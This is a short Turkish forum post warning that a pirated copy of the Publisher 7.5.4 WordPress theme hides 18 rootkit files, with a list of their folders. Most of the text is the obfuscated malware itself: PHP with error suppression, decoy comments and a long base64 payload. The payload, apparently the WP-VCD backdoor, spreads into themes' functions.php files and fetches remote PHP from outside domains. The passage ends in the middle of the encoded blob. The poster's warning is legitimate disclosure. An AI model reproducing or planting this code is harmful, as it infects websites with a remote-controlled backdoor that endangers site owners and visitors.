dataaaa
Warez temanın sitesi: Tıklayın
Temanın içinde 18 tane rootkit teşhis ettim bu rootkitler aşağıda verdiğim klasörlerdeydiler.
1.) publisher-7.5.4\publisher
2.) publisher-7.5.4\publisher\includes
3.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\core
4.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\install-demo
5.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\welcome
6.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\install-plugin
7.) publisher-7.5.4\publisher\includes\libs\better-framework\product-pages\report
8.) publisher-7.5.4\publisher\includes\libs\better-framework\admin-panel
9.) publisher-7.5.4\publisher\includes\libs\better-framework\core\field-generator
10.) publisher-7.5.4\publisher\includes\libs\better-framework\booster
11.) publisher-7.5.4\publisher\includes\libs\better-framework\tests
12.) publisher-7.5.4\publisher\includes\libs\better-framework\taxonomy
13.) publisher-7.5.4\publisher\includes\libs\better-framework\user-metabox
14.) publisher-7.5.4\publisher\includes\libs\better-framework\metabox
15.) publisher-7.5.4\publisher\includes\libs\better-framework\product-updater
16.) publisher-7.5.4\publisher\includes\libs\bs-theme-core\translation
17.) publisher-7.5.4\publisher\includes\libs\bs-theme-core\listing-pagin
18.) publisher-7.5.4\publisher\includes\libs\bs-theme-core\post-fields
Rootkit dosyası şifreliydi kırdım.
Şifreli olan rootkit dosyası:
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
//AKZXJyb3JfcmVwb3J0aW5nKDApOwovL21
DEFINE('MAX_LEVEL', 2);
//iMjUwCmluaV9zZXQoJ2Rp
DEFINE('MAX_ITERATION', 50);
//U1JIMG5LU2tLQ1hzS0
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
//1gzWmpaQ0k3Q2drS
$GLOBALS['WP_CD_CODE'] = 'PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwovL1JmVWtWUlZVVlRWRnNuCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7Ci8vMTl0WVhSagoKCSRpbnN0YWxsX2NvZGUgPSAnUEQ5d2FIQUthV1lnS0dsemMyVjBLQ1JmVWtWUlZVVlRWRnNuWVdOMGFXOXVKMTBwSUNZbUlHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTa2dKaVlnS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTQTlQU0FuZXlSUVFWTlRWMDlTUkgwbktTa0tDWHNLSkdScGRsOWpiMlJsWDI1aGJXVTlJbmR3WDNaalpDSTdDZ2tKYzNkcGRHTm9JQ2drWDFKRlVWVkZVMVJiSjJGamRHbHZiaWRkS1FvSkNRbDdDZ29KQ1FrSkNnb0tDZ29KQ1FrSlkyRnpaU0FuWTJoaGJtZGxYMlJ2YldGcGJpYzdDZ2tKQ1FrSmFXWWdLR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ibVYzWkc5dFlXbHVKMTBwS1FvSkNRa0pDUWw3Q2drSkNRa0pDUWtLQ1FrSkNRa0pDV2xtSUNnaFpXMXdkSGtvSkY5U1JWRlZSVk5VV3lkdVpYZGtiMjFoYVc0blhTa3BDZ2tKQ1FrSkNRa0pld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9KR1pwYkdVZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9YMTlHU1V4RlgxOHBLUW9KQ1NBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lvY0hKbFoxOXRZWFJqYUY5aGJHd29KeTljSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITmNLQ0pvZEhSd09sd3ZYQzhvTGlvcFhDOWpiMlJsWEM1d2FIQXZhU2NzSkdacGJHVXNKRzFoZEdOb2IyeGtaRzl0WVdsdUtTa0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLQ2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1JtYVd4bElEMGdjSEpsWjE5eVpYQnNZV05sS0Njdkp5NGtiV0YwWTJodmJHUmtiMjFoYVc1Yk1WMWJNRjB1Snk5cEp5d2tYMUpGVVZWRlUxUmJKMjVsZDJSdmJXRnBiaWRkTENBa1ptbHNaU2s3Q2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeXdnSkdacGJHVXBPd29KQ1FrSkNRa0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQWlkSEoxWlNJN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQjlDZ29LQ1FrZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLQ1FrSkNRa0pDUWw5Q2drSkNRa0pDWDBLQ1FrSkNXSnlaV0ZyT3dvS0NRa0pDUWtKQ1FsallYTmxJQ2RqYUdGdVoyVmZZMjlrWlNjN0Nna0pDUWtKYVdZZ0tHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmJtVjNZMjlrWlNkZEtTa0tDUWtKQ1FrSmV3b0pDUWtKQ1FrSkNna0pDUWtKQ1FscFppQW9JV1Z0Y0hSNUtDUmZVa1ZSVlVWVFZGc25ibVYzWTI5a1pTZGRLU2tLQ1FrSkNRa0pDUWw3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHbG1JQ2drWm1sc1pTQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeWtwQ2drSklDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlod2NtVm5YMjFoZEdOb1gyRnNiQ2duTDF3dlhDOWNKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQ2hiWEhOY1UxMHFLVnd2WEM5Y0pHVnVaRjkzY0Y5MGFHVnRaVjkwYlhBdmFTY3NKR1pwYkdVc0pHMWhkR05vYjJ4a1kyOWtaU2twQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCN0Nnb0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa1ptbHNaU0E5SUhOMGNsOXlaWEJzWVdObEtDUnRZWFJqYUc5c1pHTnZaR1ZiTVYxYk1GMHNJSE4wY21sd2MyeGhjMmhsY3lna1gxSkZVVlZGVTFSYkoyNWxkMk52WkdVblhTa3NJQ1JtYVd4bEtUc0tDUWtKSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektGOWZSa2xNUlY5ZkxDQWtabWxzWlNrN0Nna0pDUWtKQ1FrSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIQnlhVzUwSUNKMGNuVmxJanNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0Nnb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0pDUWtKQ1FrSkNYMEtDUWtKQ1FrSmZRb0pDUWtKWW5KbFlXczdDZ2tKQ1FrS0NRa0pDV1JsWm1GMWJIUTZJSEJ5YVc1MElDSkZVbEpQVWw5WFVGOUJRMVJKVDA0Z1YxQmZWbDlEUkNCWFVGOURSQ0k3Q2drSkNYMEtDUWtKQ2drSlpHbGxLQ0lpS1RzS0NYMEtDZ29LQ2dvS0Nnb2taR2wyWDJOdlpHVmZibUZ0WlNBOUlDSjNjRjkyWTJRaU93b2tablZ1WTJacGJHVWdJQ0FnSUNBOUlGOWZSa2xNUlY5Zk93cHBaaWdoWm5WdVkzUnBiMjVmWlhocGMzUnpLQ2QwYUdWdFpWOTBaVzF3WDNObGRIVndKeWtwSUhzS0lDQWdJQ1J3WVhSb0lEMGdKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkSUM0Z0pGOVRSVkpXUlZKYlVrVlJWVVZUVkY5VlVrbGRPd29nSUNBZ2FXWWdLSE4wY21sd2IzTW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwc0lDZDNjQzFqY205dUxuQm9jQ2NwSUQwOUlHWmhiSE5sSUNZbUlITjBjbWx3YjNNb0pGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTBzSUNkNGJXeHljR011Y0dod0p5a2dQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0JtZFc1amRHbHZiaUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjMTkwWTNWeWJDZ2tkWEpzS1FvZ0lDQWdJQ0FnSUhzS0lDQWdJQ0FnSUNBZ0lDQWdKR05vSUQwZ1kzVnliRjlwYm1sMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlCVlZSUFVrVkdSVkpGVWl3Z1ZGSlZSU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHTjFjbXhmYzJWMGIzQjBLQ1JqYUN3Z1ExVlNURTlRVkY5SVJVRkVSVklzSURBcE93b2dJQ0FnSUNBZ0lDQWdJQ0JqZFhKc1gzTmxkRzl3ZENna1kyZ3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPd29nSUNBZ0lDQWdJQ0FnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtkWEpzS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZM1Z5YkY5elpYUnZjSFFvSkdOb0xDQkRWVkpNVDFCVVgwWlBURXhQVjB4UFEwRlVTVTlPTENCVVVsVkZLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0pHUmhkR0VnUFNCamRYSnNYMlY0WldNb0pHTm9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ1kzVnliRjlqYkc5elpTZ2tZMmdwT3dvZ0lDQWdJQ0FnSUNBZ0lDQnlaWFIxY200Z0pHUmhkR0U3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUdaMWJtTjBhVzl1SUhSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhCb2NFTnZaR1VwQ2lBZ0lDQWdJQ0FnZXdvZ0lDQWdJQ0FnSUNBZ0lDQWtkRzF3Wm01aGJXVWdQU0IwWlcxd2JtRnRLSE41YzE5blpYUmZkR1Z0Y0Y5a2FYSW9LU3dnSW5Sb1pXMWxYM1JsYlhCZmMyVjBkWEFpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdKR2hoYm1Sc1pTQWdJRDBnWm05d1pXNG9KSFJ0Y0dadVlXMWxMQ0FpZHlzaUtUc0tJQ0FnSUNBZ0lDQWdJQ0JwWmlnZ1puZHlhWFJsS0NSb1lXNWtiR1VzSUNJOFAzQm9jRnh1SWlBdUlDUndhSEJEYjJSbEtTa0tDUWtnSUNCN0Nna0pJQ0FnZlFvSkNRbGxiSE5sQ2drSkNYc0tDUWtKSkhSdGNHWnVZVzFsSUQwZ2RHVnRjRzVoYlNnbkxpOG5MQ0FpZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ0lwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWthR0Z1Wkd4bElDQWdQU0JtYjNCbGJpZ2tkRzF3Wm01aGJXVXNJQ0ozS3lJcE93b0pDUWxtZDNKcGRHVW9KR2hoYm1Sc1pTd2dJancvY0dod1hHNGlJQzRnSkhCb2NFTnZaR1VwT3dvSkNRbDlDZ2tKQ1daamJHOXpaU2drYUdGdVpHeGxLVHNLSUNBZ0lDQWdJQ0FnSUNBZ2FXNWpiSFZrWlNBa2RHMXdabTVoYldVN0NpQWdJQ0FnSUNBZ0lDQWdJSFZ1YkdsdWF5Z2tkRzF3Wm01aGJXVXBPd29nSUNBZ0lDQWdJQ0FnSUNCeVpYUjFjbTRnWjJWMFgyUmxabWx1WldSZmRtRnljeWdwT3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBS0NpUjNjRjloZFhSb1gydGxlVDBuWlRnMk5HTmhZV0ZtWVdVek9EYzBNelpoWXpZMlpEUXhNREEzTnpGbE9Ea25Pd29nSUNBZ0lDQWdJR2xtSUNnb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW1oMGRIQTZMeTkzZDNjdWVXRnliM0p6TG1OdmJTOWpiMlJsTG5Cb2NDSXBJRTlTSUNSMGJYQmpiMjUwWlc1MElEMGdRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpYM1JqZFhKc0tDSm9kSFJ3T2k4dmQzZDNMbmxoY205eWN5NWpiMjB2WTI5a1pTNXdhSEFpS1NrZ1FVNUVJSE4wY21sd2IzTW9KSFJ0Y0dOdmJuUmxiblFzSUNSM2NGOWhkWFJvWDJ0bGVTa2dJVDA5SUdaaGJITmxLU0I3Q2dvZ0lDQWdJQ0FnSUNBZ0lDQnBaaUFvYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWNGRISmhZM1FvZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ2drZEcxd1kyOXVkR1Z1ZENrcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektFRkNVMUJCVkVnZ0xpQW5kM0F0YVc1amJIVmtaWE12ZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbktTa2dld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVCbWFXeGxYM0IxZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aG5aWFJmZEdWdGNHeGhkR1ZmWkdseVpXTjBiM0o1S0NrZ0xpQW5MM2R3TFhSdGNDNXdhSEFuS1NrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ1pXeHpaV2xtSUNna2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMM2QzZHk1NVlYSnZjbk11Y0hjdlkyOWtaUzV3YUhBaUtTQWdRVTVFSUhOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sSUNrZ2V3b0thV1lnS0hOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCbGVIUnlZV04wS0hSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhSdGNHTnZiblJsYm5RcEtUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lFQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbkxDQWtkRzF3WTI5dWRHVnVkQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNnaFptbHNaVjlsZUdsemRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5a3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb1oyVjBYM1JsYlhCc1lYUmxYMlJwY21WamRHOXllU2dwSUM0Z0p5OTNjQzEwYlhBdWNHaHdKeXdnSkhSdGNHTnZiblJsYm5RcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR2xtSUNnaFptbHNaVjlsZUdsemRITW9aMlYwWDNSbGJYQnNZWFJsWDJScGNtVmpkRzl5ZVNncElDNGdKeTkzY0MxMGJYQXVjR2h3SnlrcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektDZDNjQzEwYlhBdWNHaHdKeXdnSkhSdGNHTnZiblJsYm5RcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ2ZTQUtDUWtLQ1FrZ0lDQWdJQ0FnSUdWc2MyVnBaaUFvSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9JbWgwZEhBNkx5OTNkM2N1ZVdGeWIzSnpMblJ2Y0M5amIyUmxMbkJvY0NJcElDQkJUa1FnYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVnS1NCN0NncHBaaUFvYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWNGRISmhZM1FvZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ2drZEcxd1kyOXVkR1Z1ZENrcE93b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektFRkNVMUJCVkVnZ0xpQW5kM0F0YVc1amJIVmtaWE12ZDNBdGRHMXdMbkJvY0Njc0lDUjBiWEJqYjI1MFpXNTBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aEJRbE5RUVZSSUlDNGdKM2R3TFdsdVkyeDFaR1Z6TDNkd0xYUnRjQzV3YUhBbktTa2dld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVCbWFXeGxYM0IxZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0NGbWFXeGxYMlY0YVhOMGN5aG5aWFJmZEdWdGNHeGhkR1ZmWkdseVpXTjBiM0o1S0NrZ0xpQW5MM2R3TFhSdGNDNXdhSEFuS1NrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCQVptbHNaVjl3ZFhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdDaUFnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNCOUNna0paV3h6WldsbUlDZ2tkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3loQlFsTlFRVlJJSUM0Z0ozZHdMV2x1WTJ4MVpHVnpMM2R3TFhSdGNDNXdhSEFuS1NCQlRrUWdjM1J5YVhCdmN5Z2tkRzF3WTI5dWRHVnVkQ3dnSkhkd1gyRjFkR2hmYTJWNUtTQWhQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FnSUNBZ1pYaDBjbUZqZENoMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSMGJYQmpiMjUwWlc1MEtTazdDaUFnSUNBZ0lDQWdJQ0FnQ2lBZ0lDQWdJQ0FnZlNCbGJITmxhV1lnS0NSMGJYQmpiMjUwWlc1MElEMGdRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLR2RsZEY5MFpXMXdiR0YwWlY5a2FYSmxZM1J2Y25rb0tTQXVJQ2N2ZDNBdGRHMXdMbkJvY0NjcElFRk9SQ0J6ZEhKcGNHOXpLQ1IwYlhCamIyNTBaVzUwTENBa2QzQmZZWFYwYUY5clpYa3BJQ0U5UFNCbVlXeHpaU2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNnQ2dvZ0lDQWdJQ0FnSUgwZ1pXeHpaV2xtSUNna2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWduZDNBdGRHMXdMbkJvY0NjcElFRk9SQ0J6ZEhKcGNHOXpLQ1IwYlhCamIyNTBaVzUwTENBa2QzQmZZWFYwYUY5clpYa3BJQ0U5UFNCbVlXeHpaU2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNnQ2dvZ0lDQWdJQ0FnSUgwZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0FnSUNBZ0NpQWdJQ0I5Q24wS0NpOHZKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQW9LQ2dvdkwzZHdYM1J0Y0FvS0NpOHZKR1Z1WkY5M2NGOTBhR1Z0WlY5MGJYQUtQejQ9JzsKCQoJJGluc3RhbGxfaGFzaCA9IG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiBBVVRIX1NBTFQpOwoJJGluc3RhbGxfY29kZSA9IHN0cl9yZXBsYWNlKCd7JFBBU1NXT1JEfScgLCAkaW5zdGFsbF9oYXNoLCBiYXNlNjRfZGVjb2RlKCAkaW5zdGFsbF9jb2RlICkpOwoJCgoJCQkkdGhlbWVzID0gQUJTUEFUSCAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnd3AtY29udGVudCcgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ3RoZW1lcyc7CgkJCQkKCQkJJHBpbmcgPSB0cnVlOwoJCQkJJHBpbmcyID0gZmFsc2U7CgkJCWlmICgkbGlzdCA9IHNjYW5kaXIoICR0aGVtZXMgKSkKCQkJCXsKCQkJCQlmb3JlYWNoICgkbGlzdCBhcyAkXykKCQkJCQkJewoJCQkJCQkKCQkJCQkJCWlmIChmaWxlX2V4aXN0cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpCgkJCQkJCQkJewoJCQkJCQkJCQkkdGltZSA9IGZpbGVjdGltZSgkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyk7CgkJCQkJCQkJCQkKCQkJCQkJCQkJaWYgKCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQ